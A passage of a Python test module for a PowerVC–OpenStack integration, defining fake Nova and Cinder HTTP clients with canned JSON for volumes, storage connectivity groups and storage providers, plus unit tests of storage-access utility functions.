flavors/726544ff-9f0a-41ad-8b26-e6575bfe8146",
                                "rel": "bookmark"
                            }
                        ]
                    },
                    "user_id": "8a326a8c5a774022a1ec49f5692bc316",
                    "vcpu_mode": "shared",
                    "desired_compatibility_mode": "default",
                    "updated": "2013-09-04T07:02:57Z",
                    "memory_mode": "dedicated",
                    "key_name": None,
                    "min_memory_mb": 512,
                    "name": "hc-11",
                    "min_vcpus": "0.10",
                    "vcpus": "0.50",
                    "max_memory_mb": 4096,
                    "min_cpus": "1",
                    "links": [
                        {
                            "href": "https://localhost/powervc/openstack/\
compute\
/v2/2ec48b8ec30f4328bf95b8a5ad147c4b/servers/\
2eab7ee2-62eb-4f31-8628-20f8b06df86a",
                            "rel": "self"
                        },
                        {
                            "href": "https://localhost/powervc/openstack/\
compute/2ec48b8ec30f4328bf95b8a5ad147c4b/\
servers/2eab7ee2-62eb-4f31-8628-20f8b06df86a",
                            "rel": "bookmark"
                        }
                    ],
                    "max_vcpus": "16.00",
                    "OS-EXT-STS:vm_state": "active",
                    "OS-EXT-SRV-ATTR:instance_name":
                    "nova-z3-9-5-125-55-00000074",
                    "OS-EXT-SRV-ATTR:host": "ngp01_02_vios_1",
                    "id": "2eab7ee2-62eb-4f31-8628-20f8b06df86a",
                    "security_groups": [
                        {
                            "name": "default"
                        }
                    ],
                    "OS-DCF:diskConfig": "MANUAL",
                    "health_status": {
                        "health_value": "UNKNOWN",
                        "unknown_reason":
                        "Unable to get related hypervisor data"
                    },
                    "accessIPv4": "",
                    "accessIPv6": "",
                    "progress": 0,
                    "OS-EXT-STS:power_state": 1,
                    "OS-EXT-AZ:availability_zone": "nova",
                    "metadata": {},
                    "status": "ACTIVE",
                    "hostId":
                    "a67be7805b2dccafc012b2225f59cbad7504e8716c0fd4631bb6af73",
                    "cpu_utilization": 0.02,
                    "compliance_status": [
                        {
                            "status": "compliant",
                            "category": "resource.allocation"
                        }
                    ],
                    "current_compatibility_mode": "POWER7",
                    "root_gb": 4,
                    "OS-EXT-SRV-ATTR:hypervisor_hostname":
                    "ngp01-02-vios-1.rtp.stglabs.ibm.com",
                    "created": "2013-09-04T07:01:10Z",
                    "tenant_id": "2ec48b8ec30f4328bf95b8a5ad147c4b",
                    "memory_mb": 512,
                    "max_cpus": "16"
                }
            ]
        })
    def get_storage_connectivity_groups_f4b541cb(
            self, **kw):
        """
        Return a fake detail response for the storage connectivity group
        with id "f4b541cb" as a (status, headers, body) tuple.
        """
        return (200, {}, {"storage_connectivity_group":
                {
                    "auto_add_vios": True,
                    "fc_storage_access": False,
                    "display_name": "Auto-SCG for Registered SAN",
                    "vios_cluster":
                    {
                        "provider_id": "shared_v7000_1"
                    },
                    "host_list": [
                        {
                            "name": "ngp01_02_vios_1",
                            "vios_list": [
                                {
                                    "lpar_id": 1,
                                    "name": "10-F715A",
                                    "id": "ngp01_02_vios_1##1"
                                }
                            ]
                        },
                        {
                            "name": "ngp01_03_vios_1",
                            "vios_list": [
                                {
                                    "lpar_id": 1,
                                    "name": "10-F76CA",
                                    "id": "ngp01_03_vios_1##1"
                                }
                            ]
                        }
                    ],
                    "created_at": "2013-08-23 14:56:11.787465",
                    "enabled": True,
                    "auto_defined": True,
                    "id": "f4b541cb"
                }})
def get_storage_connectivity_groups_sdfb541cb_volumes(
        self, **kw):
    """
    Fake GET of the volumes accessible through SCG "sdfb541cb".

    Returns a (status_code, headers, body) tuple; the body lists one
    unattached "available" volume and three "in-use" boot volumes.
    (The original docstring said "storage_connectivity_group", but this
    endpoint returns volumes.)
    """
    return (200, {}, {
        "volumes": [
            # Unattached volume - the only one tests expect to be
            # SCG-accessible (it carries a real volume_type).
            {
                "status": "available",
                "display_name": "abcabc",
                "attachments": [],
                "availability_zone": "nova",
                "bootable": False,
                "created_at": "2013-08-30T07:22:20.729677",
                "display_description": "None",
                "volume_type": "shared_v7000_1-default",
                "snapshot_id": "None",
                "source_volid": "None",
                "metadata": {},
                "id": "ab41ee79-0f84-4f0d-976e-0aa122c8b89d",
                "size": 1
            },
            {
                "status": "in-use",
                "display_name": "",
                "attachments": [
                    {
                        "host_name": "None",
                        "device": "/dev/sda",
                        "server_id":
                        "103c1f3a-c2b2-4b90-80f8-cc2dd756b636",
                        "id": "2eab9958-16e1-4559-b3e6-e723360a4f27",
                        "volume_id":
                        "2eab9958-16e1-4559-b3e6-e723360a4f27"
                    }
                ],
                "availability_zone": "nova",
                "bootable": False,
                "created_at": "2013-08-30T03:33:06.272849",
                "os-vol-tenant-attr:tenant_id":
                "2ec48b8ec30f4328bf95b8a5ad147c4b",
                "display_description": "",
                "os-vol-host-attr:host": "shared_v7000_1",
                "health_status": {
                    "health_value": "OK"
                },
                "volume_type": "None",
                "snapshot_id": "None",
                "source_volid": "5f7c7d0d-b4e1-4ebc-80d4-4f1e8734f7e5",
                "metadata": {
                    "instance_uuid":
                    "103c1f3a-c2b2-4b90-80f8-cc2dd756b636",
                    "is_boot_volume": "True"
                },
                "id": "2eab9958",
                "size": 4
            },
            {
                "status": "in-use",
                "display_name": "",
                "attachments": [
                    {
                        "host_name": "None",
                        "device": "/dev/sda",
                        "server_id":
                        "6a81591c-1671-43d1-b8c2-e0eb09cdab84",
                        "id": "6c21891a-ce09-4701-98d7-1c8d0c6872cf",
                        "volume_id": "6c21891a-ce09-4701-98d7-1c8d0c6872cf"
                    }
                ],
                "availability_zone": "nova",
                "bootable": False,
                "created_at": "2013-08-30T03:32:30.922320",
                "os-vol-tenant-attr:tenant_id":
                "2ec48b8ec30f4328bf95b8a5ad147c4b",
                "display_description": "",
                "os-vol-host-attr:host": "shared_v7000_1",
                "health_status": {
                    "health_value": "OK"
                },
                "volume_type": "None",
                "snapshot_id": "None",
                "source_volid": "5f7c7d0d-b4e1-4ebc-80d4-4f1e8734f7e5",
                "metadata": {
                    "instance_uuid":
                    "6a81591c-1671-43d1-b8c2-e0eb09cdab84",
                    "is_boot_volume": "True"
                },
                "id": "6c21891a-ce09-4701-98d7-1c8d0c6872cf",
                "size": 4
            },
            {
                "status": "in-use",
                "display_name": "",
                "attachments": [
                    {
                        "host_name": "None",
                        "device": "/dev/sda",
                        "server_id":
                        "57625362-279c-4e02-bc9c-c6035904b2f1",
                        "id": "ff681131-9eab-4723-8261-6a80f8e3518d",
                        "volume_id": "ff681131-9eab-4723-8261-6a80f8e3518d"
                    }
                ],
                "availability_zone": "nova",
                "bootable": False,
                "created_at": "2013-08-30T03:32:03.243339",
                "os-vol-tenant-attr:tenant_id":
                "2ec48b8ec30f4328bf95b8a5ad147c4b",
                "display_description": "",
                "os-vol-host-attr:host": "shared_v7000_1",
                "health_status": {
                    "health_value": "OK"
                },
                "volume_type": "None",
                "snapshot_id": "None",
                "source_volid": "5f7c7d0d-b4e1-4ebc-80d4-4f1e8734f7e5",
                "metadata": {
                    "instance_uuid":
                    "57625362-279c-4e02-bc9c-c6035904b2f1",
                    "is_boot_volume": "True"
                },
                "id": "ff681131-9eab-4723-8261-6a80f8e3518d",
                "size": 4
            }
        ]
    })
def get_storage_connectivity_groups_sdfb541cb_volume_types(
        self, **kw):
    """
    Fake GET of the volume types accessible through SCG "sdfb541cb".

    Returns a (status_code, headers, body) tuple listing three types:
    the backend default plus two encryption types with no extra specs.
    """
    default_type = {
        "extra_specs": {
            "drivers:storage_pool": "P-NGP01-pool",
            "capabilities:volume_backend_name": "shared_v7000_1",
            "drivers:rsize": "-1"
        },
        "name": "shared_v7000_1-default",
        "id": "6627888e-9f59-4996-8c22-5d528c3273f0"
    }
    dm_crypt_type = {
        "extra_specs": {},
        "name": "dm-crypt",
        "id": "a3ae95f6-4aab-4446-b1d2-0fc2f60a89bb"
    }
    luks_type = {
        "extra_specs": {},
        "name": "LUKS",
        "id": "291f81a2-591b-4164-b2b2-829abc935573"
    }
    body = {"volume-types": [default_type, dm_crypt_type, luks_type]}
    return (200, {}, body)
def get_storage_connectivity_groups_f4b541cb_volumes(
        self, **kw):
    """
    Fake GET of the volumes accessible through SCG "f4b541cb".

    Returns a (status_code, headers, body) tuple; same payload as the
    "sdfb541cb" variant: one "available" volume plus three "in-use"
    boot volumes.  (The original docstring said
    "storage_connectivity_group", but this endpoint returns volumes.)
    """
    return (200, {}, {
        "volumes": [
            {
                "status": "available",
                "display_name": "abcabc",
                "attachments": [],
                "availability_zone": "nova",
                "bootable": False,
                "created_at": "2013-08-30T07:22:20.729677",
                "display_description": "None",
                "volume_type": "shared_v7000_1-default",
                "snapshot_id": "None",
                "source_volid": "None",
                "metadata": {},
                "id": "ab41ee79-0f84-4f0d-976e-0aa122c8b89d",
                "size": 1
            },
            {
                "status": "in-use",
                "display_name": "",
                "attachments": [
                    {
                        "host_name": "None",
                        "device": "/dev/sda",
                        "server_id":
                        "103c1f3a-c2b2-4b90-80f8-cc2dd756b636",
                        "id": "2eab9958-16e1-4559-b3e6-e723360a4f27",
                        "volume_id":
                        "2eab9958-16e1-4559-b3e6-e723360a4f27"
                    }
                ],
                "availability_zone": "nova",
                "bootable": False,
                "created_at": "2013-08-30T03:33:06.272849",
                "os-vol-tenant-attr:tenant_id":
                "2ec48b8ec30f4328bf95b8a5ad147c4b",
                "display_description": "",
                "os-vol-host-attr:host": "shared_v7000_1",
                "health_status": {
                    "health_value": "OK"
                },
                "volume_type": "None",
                "snapshot_id": "None",
                "source_volid": "5f7c7d0d-b4e1-4ebc-80d4-4f1e8734f7e5",
                "metadata": {
                    "instance_uuid":
                    "103c1f3a-c2b2-4b90-80f8-cc2dd756b636",
                    "is_boot_volume": "True"
                },
                "id": "2eab9958",
                "size": 4
            },
            {
                "status": "in-use",
                "display_name": "",
                "attachments": [
                    {
                        "host_name": "None",
                        "device": "/dev/sda",
                        "server_id":
                        "6a81591c-1671-43d1-b8c2-e0eb09cdab84",
                        "id": "6c21891a-ce09-4701-98d7-1c8d0c6872cf",
                        "volume_id": "6c21891a-ce09-4701-98d7-1c8d0c6872cf"
                    }
                ],
                "availability_zone": "nova",
                "bootable": False,
                "created_at": "2013-08-30T03:32:30.922320",
                "os-vol-tenant-attr:tenant_id":
                "2ec48b8ec30f4328bf95b8a5ad147c4b",
                "display_description": "",
                "os-vol-host-attr:host": "shared_v7000_1",
                "health_status": {
                    "health_value": "OK"
                },
                "volume_type": "None",
                "snapshot_id": "None",
                "source_volid": "5f7c7d0d-b4e1-4ebc-80d4-4f1e8734f7e5",
                "metadata": {
                    "instance_uuid":
                    "6a81591c-1671-43d1-b8c2-e0eb09cdab84",
                    "is_boot_volume": "True"
                },
                "id": "6c21891a-ce09-4701-98d7-1c8d0c6872cf",
                "size": 4
            },
            {
                "status": "in-use",
                "display_name": "",
                "attachments": [
                    {
                        "host_name": "None",
                        "device": "/dev/sda",
                        "server_id":
                        "57625362-279c-4e02-bc9c-c6035904b2f1",
                        "id": "ff681131-9eab-4723-8261-6a80f8e3518d",
                        "volume_id": "ff681131-9eab-4723-8261-6a80f8e3518d"
                    }
                ],
                "availability_zone": "nova",
                "bootable": False,
                "created_at": "2013-08-30T03:32:03.243339",
                "os-vol-tenant-attr:tenant_id":
                "2ec48b8ec30f4328bf95b8a5ad147c4b",
                "display_description": "",
                "os-vol-host-attr:host": "shared_v7000_1",
                "health_status": {
                    "health_value": "OK"
                },
                "volume_type": "None",
                "snapshot_id": "None",
                "source_volid": "5f7c7d0d-b4e1-4ebc-80d4-4f1e8734f7e5",
                "metadata": {
                    "instance_uuid":
                    "57625362-279c-4e02-bc9c-c6035904b2f1",
                    "is_boot_volume": "True"
                },
                "id": "ff681131-9eab-4723-8261-6a80f8e3518d",
                "size": 4
            }
        ]
    })
def get_storage_connectivity_groups_f4b541cb_volume_types(
        self, **kw):
    """
    Fake GET of the volume types accessible through SCG "f4b541cb".

    Returns a (status_code, headers, body) tuple listing three types:
    the backend default plus two encryption types with no extra specs.
    """
    backend_default = {
        "extra_specs": {
            "drivers:storage_pool": "P-NGP01-pool",
            "capabilities:volume_backend_name": "shared_v7000_1",
            "drivers:rsize": "-1"
        },
        "name": "shared_v7000_1-default",
        "id": "6627888e-9f59-4996-8c22-5d528c3273f0"
    }
    dm_crypt = {
        "extra_specs": {},
        "name": "dm-crypt",
        "id": "a3ae95f6-4aab-4446-b1d2-0fc2f60a89bb"
    }
    luks = {
        "extra_specs": {},
        "name": "LUKS",
        "id": "291f81a2-591b-4164-b2b2-829abc935573"
    }
    return (200, {}, {"volume-types": [backend_default, dm_crypt, luks]})
def get_storage_connectivity_groups(self, **kw):
    """
    Fake GET of the storage connectivity group summary list.

    Returns a (status_code, headers, body) tuple; the body carries the
    two known SCGs as (display_name, id) summaries.
    """
    scg_summaries = [
        {
            "display_name": "Auto-SCG for Registered SAN",
            "id": "f4b541cb"
        },
        {
            "display_name": "SCG sample",
            "id": "sdfb541cb"
        },
    ]
    return (200, {}, {"storage_connectivity_groups": scg_summaries})
def get_storage_connectivity_groups_detail(self, **kw):
    """
    Fake GET of the detailed storage connectivity group list.

    Returns a (status_code, headers, body) tuple with both SCGs
    ("f4b541cb" and "sdfb541cb") fully populated; each has the same
    two-host, one-VIOS-per-host topology.
    """
    return (200, {}, {"storage_connectivity_groups": [
        {
            "auto_add_vios": True,
            "fc_storage_access": True,
            "display_name": "Auto-SCG for Registered SAN",
            "host_list": [
                {
                    "name": "ngp01_02_vios_1",
                    "vios_list": [
                        {
                            "lpar_id": 1,
                            "name": "10-F715A",
                            "id": "ngp01_02_vios_1##1"
                        }
                    ]
                },
                {
                    "name": "ngp01_03_vios_1",
                    "vios_list": [
                        {
                            "lpar_id": 1,
                            "name": "10-F76CA",
                            "id": "ngp01_03_vios_1##1"
                        }
                    ]
                }
            ],
            "created_at": "2013-08-23 14:56:11.787465",
            "enabled": True,
            "auto_defined": True,
            "id": "f4b541cb"
        },
        {
            "auto_add_vios": True,
            "fc_storage_access": True,
            "display_name": "SCG Sample",
            "host_list": [
                {
                    "name": "ngp01_02_vios_1",
                    "vios_list": [
                        {
                            "lpar_id": 1,
                            "name": "10-F715A",
                            "id": "ngp01_02_vios_1##1"
                        }
                    ]
                },
                {
                    "name": "ngp01_03_vios_1",
                    "vios_list": [
                        {
                            "lpar_id": 1,
                            "name": "10-F76CA",
                            "id": "ngp01_03_vios_1##1"
                        }
                    ]
                }
            ],
            "created_at": "2013-08-23 14:56:11.787465",
            "enabled": True,
            "auto_defined": True,
            "id": "sdfb541cb"
        }
    ]})
class PVCFakeCinderClient(cinderfakes.FakeClient):
    """
    This PVCFakeClient class extends the current cinder FakeClient,
    and pvccinderclient.CinderClient.
    aiming to set the self client variable to PVCFakeHTTPClient
    """

    def __init__(self, *args, **kwargs):
        # Run the stock fake-client setup first, then swap the HTTP
        # transport for the PowerVC-flavoured fake so every request is
        # answered from canned JSON.
        cinderfakes.FakeClient.__init__(self, *args, **kwargs)
        self.client = PVCFakeCinderHTTPClient(**kwargs)
class PVCFakeCinderHTTPClient(cinderfakes.FakeHTTPClient):
    """
    This PVCFakeHTTPClient class extends the current cinder FakeHTTPClient.
    For all the HTTP requests in this class, it returns a fake json data
    as specified beforehand instead of requesting to a real environment.
    Each handler returns a (status_code, headers, body) tuple.
    """

    def __init__(self, **kwargs):
        cinderfakes.FakeHTTPClient.__init__(self, **kwargs)

    #
    # Volumes related
    #
    def get_volumes_2eab9958(self, **kw):
        # Fake GET /volumes/2eab9958: wrap a single volume from the
        # detail listing.
        # NOTE(review): [2] picks the *body* out of the detail tuple;
        # volumes[0] is the "available" volume (id ab41ee79...), not the
        # volume named "2eab9958" (which is volumes[1]).  Confirm
        # whether callers depend on the current value before changing.
        r = {'volume': self.get_volumes_detail()[2]['volumes'][0]}
        return (200, {}, r)

    def get_volumes_detail(self, **kw):
        """
        Override the parent method to a powerVC specified volume data.
        Returns one "available" volume and three "in-use" boot volumes.
        """
        return (200, {}, {
            "volumes": [
                {
                    "status": "available",
                    "display_name": "abcabc",
                    "attachments": [],
                    "availability_zone": "nova",
                    "bootable": False,
                    "created_at": "2013-08-30T07:22:20.729677",
                    "display_description": "None",
                    "volume_type": "shared_v7000_1-default",
                    "snapshot_id": "None",
                    "source_volid": "None",
                    "metadata": {},
                    "id": "ab41ee79-0f84-4f0d-976e-0aa122c8b89d",
                    "size": 1
                },
                {
                    "status": "in-use",
                    "display_name": "",
                    "attachments": [
                        {
                            "host_name": "None",
                            "device": "/dev/sda",
                            "server_id":
                            "103c1f3a-c2b2-4b90-80f8-cc2dd756b636",
                            "id": "2eab9958-16e1-4559-b3e6-e723360a4f27",
                            "volume_id":
                            "2eab9958-16e1-4559-b3e6-e723360a4f27"
                        }
                    ],
                    "availability_zone": "nova",
                    "bootable": False,
                    "created_at": "2013-08-30T03:33:06.272849",
                    "os-vol-tenant-attr:tenant_id":
                    "2ec48b8ec30f4328bf95b8a5ad147c4b",
                    "display_description": "",
                    "os-vol-host-attr:host": "shared_v7000_1",
                    "health_status": {
                        "health_value": "OK"
                    },
                    "volume_type": "None",
                    "snapshot_id": "None",
                    "source_volid": "5f7c7d0d-b4e1-4ebc-80d4-4f1e8734f7e5",
                    "metadata": {
                        "instance_uuid":
                        "103c1f3a-c2b2-4b90-80f8-cc2dd756b636",
                        "is_boot_volume": "True"
                    },
                    "id": "2eab9958",
                    "size": 4
                },
                {
                    "status": "in-use",
                    "display_name": "",
                    "attachments": [
                        {
                            "host_name": "None",
                            "device": "/dev/sda",
                            "server_id":
                            "6a81591c-1671-43d1-b8c2-e0eb09cdab84",
                            "id": "6c21891a-ce09-4701-98d7-1c8d0c6872cf",
                            "volume_id": "6c21891a-ce09-4701-98d7-1c8d0c6872cf"
                        }
                    ],
                    "availability_zone": "nova",
                    "bootable": False,
                    "created_at": "2013-08-30T03:32:30.922320",
                    "os-vol-tenant-attr:tenant_id":
                    "2ec48b8ec30f4328bf95b8a5ad147c4b",
                    "display_description": "",
                    "os-vol-host-attr:host": "shared_v7000_1",
                    "health_status": {
                        "health_value": "OK"
                    },
                    "volume_type": "None",
                    "snapshot_id": "None",
                    "source_volid": "5f7c7d0d-b4e1-4ebc-80d4-4f1e8734f7e5",
                    "metadata": {
                        "instance_uuid":
                        "6a81591c-1671-43d1-b8c2-e0eb09cdab84",
                        "is_boot_volume": "True"
                    },
                    "id": "6c21891a-ce09-4701-98d7-1c8d0c6872cf",
                    "size": 4
                },
                {
                    "status": "in-use",
                    "display_name": "",
                    "attachments": [
                        {
                            "host_name": "None",
                            "device": "/dev/sda",
                            "server_id":
                            "57625362-279c-4e02-bc9c-c6035904b2f1",
                            "id": "ff681131-9eab-4723-8261-6a80f8e3518d",
                            "volume_id": "ff681131-9eab-4723-8261-6a80f8e3518d"
                        }
                    ],
                    "availability_zone": "nova",
                    "bootable": False,
                    "created_at": "2013-08-30T03:32:03.243339",
                    "os-vol-tenant-attr:tenant_id":
                    "2ec48b8ec30f4328bf95b8a5ad147c4b",
                    "display_description": "",
                    "os-vol-host-attr:host": "shared_v7000_1",
                    "health_status": {
                        "health_value": "OK"
                    },
                    "volume_type": "None",
                    "snapshot_id": "None",
                    "source_volid": "5f7c7d0d-b4e1-4ebc-80d4-4f1e8734f7e5",
                    "metadata": {
                        "instance_uuid":
                        "57625362-279c-4e02-bc9c-c6035904b2f1",
                        "is_boot_volume": "True"
                    },
                    "id": "ff681131-9eab-4723-8261-6a80f8e3518d",
                    "size": 4
                }
            ]
        })

    def post_volumes_pvcvolume_action(self, body, **kw):
        """
        Add this method to handle powerVC volume post actions
        Here is the same logic as OpenStack one for example.
        Asserts the request body for each known action and returns a
        202 with an empty body (except os-initialize_connection, which
        returns fake connection info).
        """
        _body = None
        resp = 202
        # Exactly one action key is expected per request.
        assert len(list(body.keys())) == 1
        action = list(body.keys())[0]
        if action == 'os-attach':
            assert sorted(list(body[action])) == ['instance_uuid',
                                                  'mode',
                                                  'mountpoint']
        elif action == 'os-detach':
            assert body[action] is None
        elif action == 'os-reserve':
            assert body[action] is None
        elif action == 'os-unreserve':
            assert body[action] is None
        elif action == 'os-initialize_connection':
            assert list(body[action].keys()) == ['connector']
            return (202, {}, {'connection_info': 'foos'})
        elif action == 'os-terminate_connection':
            assert list(body[action].keys()) == ['connector']
        elif action == 'os-begin_detaching':
            assert body[action] is None
        elif action == 'os-roll_detaching':
            assert body[action] is None
        elif action == 'os-reset_status':
            assert 'status' in body[action]
        else:
            raise AssertionError("Unexpected action: %s" % action)
        return (resp, {}, _body)

    #
    # volume type related
    #
    def get_types(self, **kw):
        # Fake GET /types: the backend default plus two encryption
        # types (note the key here is "volume_types", not
        # "volume-types" as in the SCG-scoped endpoints).
        return (200, {}, {
            "volume_types": [
                {
                    "extra_specs": {
                        "drivers:storage_pool": "P-NGP01-pool",
                        "capabilities:volume_backend_name": "shared_v7000_1",
                        "drivers:rsize": "-1"
                    },
                    "name": "shared_v7000_1-default",
                    "id": "6627888e-9f59-4996-8c22-5d528c3273f0"
                },
                {
                    "extra_specs": {},
                    "name": "dm-crypt",
                    "id": "a3ae95f6-4aab-4446-b1d2-0fc2f60a89bb"
                },
                {
                    "extra_specs": {},
                    "name": "LUKS",
                    "id": "291f81a2-591b-4164-b2b2-829abc935573"
                }
            ]
        })

    def get_storage_providers_2(self, **kw):
        """
        To get a fake detail storage_provider which id is 2
        """
        return (200, {}, {"storage_provider":
                          {
                              "backend_type": "svc",
                              "volume_count": "null",
                              "service": {
                                  "host_display_name": "shared_v7000_1",
                                  "host": "shared_v7000_1",
                                  "id": 4
                              },
                              "backend_id": "00000200A0204C30",
                              "health_status": {
                                  "health_value": "OK"
                              },
                              "free_capacity_gb": 873.5,
                              "total_capacity_gb": 1115.5,
                              "storage_hostname": "shared_v7000_1",
                              "id": 2,
                              "backend_state": "running"
                          }})

    def get_storage_providers_detail(self, **kw):
        """
        To return a fake detail storage_providers
        (two providers, ids 2 and 3, both running).
        """
        return (200, {}, {"storage_providers": [
            {
                "backend_type": "svc",
                "volume_count": "null",
                "service": {
                    "host_display_name": "shared_v7000_1",
                    "host": "shared_v7000_1",
                    "id": 4
                },
                "backend_id": "00000200A0204C30",
                "health_status": {
                    "health_value": "OK"
                },
                "free_capacity_gb": 873.5,
                "total_capacity_gb": 1115.5,
                "storage_hostname": "shared_v7000_1",
                "id": 2,
                "backend_state": "running",
                "storage_type": "fc"
            },
            {
                "backend_type": "fc",
                "volume_count": "null",
                "service": {
                    "host_display_name": "shared_v7000_1",
                    "host": "shared_v7000_1",
                    "id": 4
                },
                "backend_id": "00000200A0204C31",
                "health_status": {
                    "health_value": "OK"
                },
                "free_capacity_gb": 73.5,
                "total_capacity_gb": 115.5,
                "storage_hostname": "shared_v7000_2",
                "id": 3,
                "backend_state": "running",
                "storage_type": "fc"
            }
        ]})
class FakeUtils(pvc_utils.Utils):
    """
    Utils test double: deliberately skips the parent constructor so no
    real clients are created; the test fixture injects fakes afterwards.
    """

    def __init__(self):
        # Placeholders only - UtilsFakeTest.setUp() fills these in with
        # fake nova/cinder clients and an SCG cache.
        self.scg_cache = None
        self._cinderclient = None
        self._novaclient = None
class UtilsFakeTest(utils.TestCase):
    """
    Testcases for utils.py in this class reads the storage connectivity
    group, storage provider, storage template and volume from fake data.
    All the cases in this class should be run successfully.
    """

    def setUp(self):
        super(UtilsFakeTest, self).setUp()
        config.parse_power_config(['/etc/powervc/powervc.conf'], 'cinder')
        self.utils = FakeUtils()
        # get nova_client
        nova_fakeclient = PVCFakeNovaClient('r', 'p', 's',
                                            'http://localhost:5000/')
        # delegate to nova extension class
        nova_client = delegate.new_composite_deletgate(
            [ext_nova.Client(nova_fakeclient), nova_fakeclient])
        # get cinder client
        cinder_fakeclient = PVCFakeCinderClient('r', 'p')
        # delegate to cinder extension class
        cinder_client = delegate.new_composite_deletgate(
            [ext_cinder.Client(cinder_fakeclient), cinder_fakeclient])
        self.utils._novaclient = nova_client
        self.utils._cinderclient = cinder_client
        self.utils.scg_cache = SCGCache(nova_client)
        self.scg_id_list = ['sdfb541cb',
                            'f4b541cb']
        self.scg_name_list = ['Auto-SCG for Registered SAN',
                              'SCG Sample']

    def test_get_multi_scg_accessible_storage_providers_1(self):
        accessible_storage_providers = \
            self.utils.get_multi_scg_accessible_storage_providers(
                scg_uuid_list=self.scg_id_list,
                scg_name_list=None)
        self.assertEqual([provider.storage_hostname
                          for provider in accessible_storage_providers],
                         ['shared_v7000_1', 'shared_v7000_2'])

    def test_get_multi_scg_accessible_storage_providers_2(self):
        accessible_storage_providers = \
            self.utils.get_multi_scg_accessible_storage_providers(
                scg_uuid_list=None,
                scg_name_list=self.scg_name_list)
        self.assertEqual([provider.id
                          for provider in accessible_storage_providers],
                         [2, 3])

    def test_get_scg_accessible_storage_providers_1(self):
        accessible_storage_providers = \
            self.utils.get_scg_accessible_storage_providers(
                "f4b541cb")
        self.assertEqual(accessible_storage_providers[0].storage_hostname,
                         "shared_v7000_1")

    def test_get_scg_accessible_storage_providers_2(self):
        """
        Test when scg not specified
        """
        accessible_storage_providers = \
            self.utils.get_scg_accessible_storage_providers()
        self.assertEqual(accessible_storage_providers[0].storage_hostname,
                         "shared_v7000_1")

    def test_get_multi_scg_accessible_storage_templates_1(self):
        accessible_storage_templates = \
            self.utils.get_multi_scg_accessible_storage_templates(
                scg_uuid_list=self.scg_id_list,
                scg_name_list=None)
        # Should return the storage template which in the accessible
        # storage providers
        self.assertEqual([st.name for st in accessible_storage_templates],
                         ['dm-crypt', 'LUKS', 'shared_v7000_1-default'])

    def test_get_multi_scg_accessible_storage_templates_2(self):
        accessible_storage_templates = \
            self.utils.get_multi_scg_accessible_storage_templates(
                scg_uuid_list=None,
                scg_name_list=self.scg_name_list)
        # Should return the storage template which in the accessible
        # storage providers
        self.assertEqual([st.name for st in accessible_storage_templates],
                         ['dm-crypt', 'LUKS', 'shared_v7000_1-default'])

    def test_get_scg_accessible_storage_templates_1(self):
        accessible_storage_templates = \
            self.utils.get_scg_accessible_storage_templates(
                "f4b541cb")
        # Should return the storage template which in the accessible
        # storage providers
        self.assertEqual(accessible_storage_templates[0].name,
                         "shared_v7000_1-default")

    def test_get_multi_scg_accessible_volumes_1(self):
        scg_accessible_volumes = \
            self.utils.get_multi_scg_accessible_volumes(
                scg_uuid_list=self.scg_id_list,
                scg_name_list=None)
        # Should return the volume which in the accessible
        # storage templates
        self.assertEqual([volume.id for volume in scg_accessible_volumes],
                         ["ab41ee79-0f84-4f0d-976e-0aa122c8b89d"])

    def test_get_scg_accessible_volumes_1(self):
        scg_accessible_volumes = \
            self.utils.get_scg_accessible_volumes(
                "f4b541cb")
        # Should return the volume which in the accessible
        # storage templates
        self.assertEqual(scg_accessible_volumes[0].id,
                         "ab41ee79-0f84-4f0d-976e-0aa122c8b89d")

    def test_get_multi_scg_accessible_volumes_2(self):
        scg_accessible_volumes = \
            self.utils.get_multi_scg_accessible_volumes(
                scg_uuid_list=None,
                scg_name_list=self.scg_name_list)
        # Should return the volume which in the accessible
        # storage templates
        self.assertEqual([volume.id for volume in scg_accessible_volumes],
                         ["ab41ee79-0f84-4f0d-976e-0aa122c8b89d"])

    def test_get_scg_accessible_volumes_2(self):
        scg_accessible_volumes = \
            self.utils.get_scg_accessible_volumes(
                scgName="Auto-SCG for Registered SAN")
        # Should return the volume which in the accessible
        # storage templates
        self.assertEqual(scg_accessible_volumes[0].id,
                         "ab41ee79-0f84-4f0d-976e-0aa122c8b89d")

    def test_get_scg_cache(self):
        new_scg = self.utils.get_scg_cache(self.utils._novaclient)
        self.assertNotEqual(new_scg, self.utils.scg_cache)

    def test_get_all_scgs(self):
        scg_list = self.utils.get_all_scgs()
        self.assertEqual([scg.id for scg in scg_list],
                         self.scg_id_list)

    def test_get_our_scg_list(self):
        from powervc.common import config as cg
        cg.CONF['powervc'].storage_connectivity_group = self.scg_name_list
        scg_list = self.utils.get_our_scg_list()
        self.assertIsNotNone(scg_list)

    def test_validate_scgs(self):
        from powervc.common import config as cg
        cg.CONF['powervc'].storage_connectivity_group = self.scg_name_list
        ret = self.utils.validate_scgs()
        self.assertTrue(ret)

    def test_get_scg_by_scgName_1(self):
        scg = self.utils.get_scg_by_scgName("Auto-SCG for Registered SAN")
        self.assertIsNotNone(scg)

    def test_get_scg_id_by_scgName_1(self):
        scg_id = self.utils.\
            get_scg_id_by_scgName("Auto-SCG for Registered SAN")
        self.assertEqual(scg_id, "f4b541cb")

    def test_get_scg_id_by_scgName_2(self):
        scg_id = self.utils.\
            get_scg_id_by_scgName("Auto-SCG for Registered SAN")
        self.assertIsNotNone(scg_id)

    def test_get_scg_id_by_scgName_3(self):
        # An unknown name yields the empty string, not an exception.
        scg_id = self.utils.\
            get_scg_id_by_scgName("NON-Auto-SCG for Registered SAN")
        self.assertEqual(scg_id, "")

    def test_get_scg_accessible_storage_servers_1(self):
        servers = self.utils.get_scg_accessible_servers()
        self.assertIsNotNone(servers)

    def test_get_scg_accessible_storage_servers_2(self):
        servers = self.utils.get_scg_accessible_servers(
            scgName="Auto-SCG for Registered SAN")
        self.assertIsNotNone(servers)

    def compare_to_expected(self, expected, hyper):
        # Helper: assert every expected attribute matches on the object.
        for key, value in expected.items():
            self.assertEqual(getattr(hyper, key), value)

    def test_get_image_scgs(self):
        self.utils._novaclient = mock.MagicMock()
        self.utils.get_image_scgs('imageUUID')
        self.utils._novaclient.storage_connectivity_groups.\
            list_for_image.assert_called_with('imageUUID')
        scgs = self.utils.get_image_scgs(None)
        self.assertEqual(scgs, [])

    def test_get_scg_image_ids(self):
        self.utils._novaclient = mock.MagicMock()
        self.utils.get_scg_image_ids('scgUUID')
        self.utils._novaclient.scg_images.\
            list_ids.assert_called_with('scgUUID')
        imgs = self.utils.get_image_scgs(None)
        self.assertEqual(imgs, [])

    def test_get_local_staging_project_id(self):
        class Tenant(object):
            def __init__(self, name, tid):
